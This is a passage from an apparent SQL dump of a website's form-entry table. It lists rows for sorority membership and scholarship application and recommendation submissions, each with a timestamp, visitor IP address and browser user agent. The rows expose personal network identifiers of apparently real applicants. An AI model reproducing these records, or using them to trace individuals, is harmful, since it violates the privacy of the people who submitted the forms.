01:43:24',0,0,'69.243.41.253','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U Build/R16NW; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(243,10,NULL,'2018-11-16 01:43:42',0,0,'69.243.41.253','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U Build/R16NW; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(244,8,NULL,'2018-12-20 19:17:02',0,0,'198.51.197.42','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(245,8,NULL,'2018-12-20 19:27:13',0,0,'198.51.197.42','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(246,6,NULL,'2019-01-02 22:10:44',0,0,'134.192.250.80','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(247,6,NULL,'2019-01-13 23:14:51',0,0,'71.121.167.237','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(248,10,NULL,'2019-01-14 00:14:50',0,0,'72.186.253.78','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(249,8,NULL,'2019-01-15 18:06:16',0,0,'204.126.132.231','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(250,10,NULL,'2019-01-16 19:39:43',0,0,'166.91.253.16','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(251,10,NULL,'2019-01-16 20:14:12',0,0,'205.254.147.8','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(252,10,NULL,'2019-01-20 08:45:55',0,0,'68.134.36.89','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(253,10,NULL,'2019-01-21 22:26:03',0,0,'72.66.52.61','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-G935P Build/R16NW; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/204.0.0.24.101;]','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(254,8,NULL,'2019-01-23 16:30:47',0,0,'98.204.240.247','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(255,8,NULL,'2019-01-29 13:13:43',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(256,8,NULL,'2019-01-29 20:04:51',0,0,'50.207.202.114','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(257,8,NULL,'2019-01-29 21:33:26',0,0,'98.117.57.249','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(258,6,NULL,'2019-01-31 16:54:13',0,0,'50.226.149.83','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(259,6,NULL,'2019-02-10 20:13:52',0,0,'73.87.236.120','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(260,6,NULL,'2019-02-11 01:45:07',0,0,'71.244.216.250','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(261,8,NULL,'2019-02-11 12:22:47',0,0,'50.225.39.77','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:65.0) Gecko/20100101 Firefox/65.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(262,10,NULL,'2019-02-18 01:22:12',0,0,'69.251.5.252','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(263,10,NULL,'2019-02-18 13:55:16',0,0,'68.33.93.255','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(264,8,NULL,'2019-02-19 05:06:04',0,0,'50.76.13.70','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(265,8,NULL,'2019-02-19 06:58:56',0,0,'50.76.13.70','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(266,8,NULL,'2019-02-25 00:27:11',0,0,'173.64.65.27','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(267,8,NULL,'2019-02-25 17:43:20',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(268,8,NULL,'2019-02-25 18:08:05',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(269,8,NULL,'2019-02-26 12:37:16',0,0,'50.225.39.88','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:64.0) Gecko/20100101 Firefox/64.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(270,8,NULL,'2019-03-02 19:37:40',0,0,'68.33.2.172','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(271,10,NULL,'2019-03-02 23:52:45',0,0,'69.143.204.33','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.1.0; REVVL 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(272,6,NULL,'2019-03-04 02:16:38',0,0,'96.234.206.57','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(273,8,NULL,'2019-03-04 02:26:51',0,0,'96.234.206.57','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(274,8,NULL,'2019-03-04 02:30:05',0,0,'96.234.206.57','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(275,8,NULL,'2019-03-04 16:33:06',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(276,6,NULL,'2019-03-06 17:40:54',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(277,8,NULL,'2019-03-07 11:49:36',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(278,8,NULL,'2019-03-11 00:07:24',0,0,'100.16.160.173','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(279,8,NULL,'2019-03-12 14:46:10',0,0,'50.225.39.86','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:62.0) Gecko/20100101 Firefox/62.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(280,8,NULL,'2019-03-12 21:00:01',0,0,'68.134.15.174','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(281,8,NULL,'2019-03-18 02:26:49',0,0,'71.179.29.229','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(282,8,NULL,'2019-03-18 18:19:10',0,0,'50.225.39.89','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(283,8,NULL,'2019-03-19 00:42:14',0,0,'71.166.61.183','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(284,8,NULL,'2019-03-19 00:43:53',0,0,'71.166.61.183','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(285,6,NULL,'2019-03-19 01:01:16',0,0,'71.166.61.183','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(286,8,NULL,'2019-03-19 13:52:44',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(287,8,NULL,'2019-03-19 19:36:42',0,0,'50.226.149.83','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(288,8,NULL,'2019-03-20 17:51:08',0,0,'50.200.35.131','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(289,8,NULL,'2019-03-21 14:45:36',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(290,8,NULL,'2019-03-21 18:54:35',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(291,8,NULL,'2019-03-22 18:50:37',0,0,'198.51.197.42','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(292,8,NULL,'2019-03-22 19:03:12',0,0,'50.225.39.88','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(293,6,NULL,'2019-03-23 20:14:37',0,0,'73.87.223.20','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(294,6,NULL,'2019-03-24 23:21:49',0,0,'69.143.239.148','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(295,8,NULL,'2019-03-25 13:32:57',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(296,8,NULL,'2019-03-25 13:41:32',0,0,'96.244.83.31','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(297,8,NULL,'2019-03-25 15:27:45',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(298,8,NULL,'2019-03-25 15:41:02',0,0,'50.225.39.35','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(299,8,NULL,'2019-03-26 14:31:11',0,0,'50.225.39.79','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(300,8,NULL,'2019-03-26 15:21:57',0,0,'50.225.39.80','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(301,6,NULL,'2019-03-26 20:33:52',0,0,'96.244.217.137','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(302,8,NULL,'2019-03-27 00:46:45',0,0,'100.36.95.122','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(303,6,NULL,'2019-03-27 01:00:27',0,0,'100.16.223.191','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(304,6,NULL,'2019-03-27 01:39:54',0,0,'69.137.152.15','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(305,8,NULL,'2019-03-27 12:34:27',0,0,'50.225.39.79','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(306,8,NULL,'2019-03-27 15:12:52',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(307,8,NULL,'2019-03-27 15:28:27',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(308,8,NULL,'2019-03-27 15:46:08',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(309,8,NULL,'2019-03-27 17:01:07',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(310,8,NULL,'2019-03-27 17:41:56',0,0,'150.148.14.158','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(311,8,NULL,'2019-03-28 02:38:02',0,0,'71.121.211.190','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(312,6,NULL,'2019-03-28 05:08:45',0,0,'108.31.56.19','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(313,8,NULL,'2019-03-28 11:31:21',0,0,'50.225.39.79','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(314,8,NULL,'2019-03-28 17:19:39',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(315,8,NULL,'2019-03-28 18:19:02',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(316,6,NULL,'2019-03-28 19:49:56',0,0,'74.119.60.249','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(317,8,NULL,'2019-03-28 20:43:38',0,0,'208.253.57.2','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(318,6,NULL,'2019-03-28 21:17:07',0,0,'150.148.14.140','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(319,6,NULL,'2019-03-28 23:55:18',0,0,'96.255.56.72','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(320,6,NULL,'2019-03-29 00:33:52',0,0,'68.134.35.113','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(321,6,NULL,'2019-03-29 00:52:20',0,0,'69.143.141.242','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(322,6,NULL,'2019-03-29 02:12:06',0,0,'69.140.139.112','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(323,6,NULL,'2019-03-29 03:15:24',0,0,'71.179.179.138','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(324,6,NULL,'2019-03-29 03:23:34',0,0,'24.126.81.25','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(325,8,NULL,'2019-03-29 03:36:36',0,0,'71.179.179.138','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(326,8,NULL,'2019-03-29 12:15:31',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(327,8,NULL,'2019-03-29 15:29:53',0,0,'50.225.39.80','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(328,8,NULL,'2019-03-29 15:32:13',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(329,8,NULL,'2019-03-29 17:16:55',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(330,6,NULL,'2019-03-29 17:43:33',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(331,6,NULL,'2019-03-29 